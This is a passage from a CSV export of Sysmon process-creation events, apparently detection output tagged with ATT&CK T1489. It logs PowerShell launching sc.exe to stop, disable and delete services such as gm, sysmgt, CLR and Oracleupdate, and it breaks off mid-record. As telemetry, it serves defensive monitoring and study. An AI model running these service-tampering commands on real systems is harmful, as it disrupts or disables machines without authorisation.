+CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete \\gm",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:55.286602900Z"",""eventRecordID"":""2877"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:55.283\r\nProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010ddcf2500}\r\nProcessId: 6420\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete \\gm\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:55.283"",""processGuid"":""{df9fc3d3-b3af-5ecf-0000-0010ddcf2500}"",""processId"":""6420"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete \\\\gm"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:23.403",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:55.270 +ProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010cccd2500} +ProcessId: 7512 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop \gm +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \\gm",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:55.272798200Z"",""eventRecordID"":""2876"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:55.270\r\nProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010cccd2500}\r\nProcessId: 7512\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \\gm\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John 
Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:55.270"",""processGuid"":""{df9fc3d3-b3af-5ecf-0000-0010cccd2500}"",""processId"":""7512"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\\gm"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:23.354",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:55.228 
+ProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010b0c92500} +ProcessId: 6336 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop sysmgt +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop sysmgt",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:55.233191400Z"",""eventRecordID"":""2873"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:55.228\r\nProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010b0c92500}\r\nProcessId: 6336\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: 
\""C:\\Windows\\system32\\sc.exe\"" Stop sysmgt\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:55.228"",""processGuid"":""{df9fc3d3-b3af-5ecf-0000-0010b0c92500}"",""processId"":""6336"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop sysmgt"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 
29, 2020 @ 14:19:23.308",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:55.171 +ProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010bbc22500} +ProcessId: 8168 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop CLR +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop CLR",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:55.175005100Z"",""eventRecordID"":""2870"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:55.171\r\nProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010bbc22500}\r\nProcessId: 8168\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: 
Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop CLR\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:55.171"",""processGuid"":""{df9fc3d3-b3af-5ecf-0000-0010bbc22500}"",""processId"":""8168"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop CLR"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:23.291",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:55.148 +ProcessGuid: {df9fc3d3-b3af-5ecf-0000-00108dc12500} +ProcessId: 4216 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config CLR Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config CLR Start= 
Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:55.154180600Z"",""eventRecordID"":""2869"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:55.148\r\nProcessGuid: {df9fc3d3-b3af-5ecf-0000-00108dc12500}\r\nProcessId: 4216\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config CLR Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:55.148"",""processGuid"":""{df9fc3d3-b3af-5ecf-0000-00108dc12500}"",""processId"":""4216"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config CLR Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:23.259",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:55.099 +ProcessGuid: {df9fc3d3-b3af-5ecf-0000-00106abe2500} +ProcessId: 7356 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Oracleupdate +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Oracleupdate",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:55.107919100Z"",""eventRecordID"":""2867"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:55.099\r\nProcessGuid: {df9fc3d3-b3af-5ecf-0000-00106abe2500}\r\nProcessId: 7356\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Oracleupdate\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:50:55.099"",""processGuid"":""{df9fc3d3-b3af-5ecf-0000-00106abe2500}"",""processId"":""7356"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Oracleupdate"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:23.214",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:55.038 +ProcessGuid: {df9fc3d3-b3af-5ecf-0000-001029b92500} +ProcessId: 6188 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop system +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 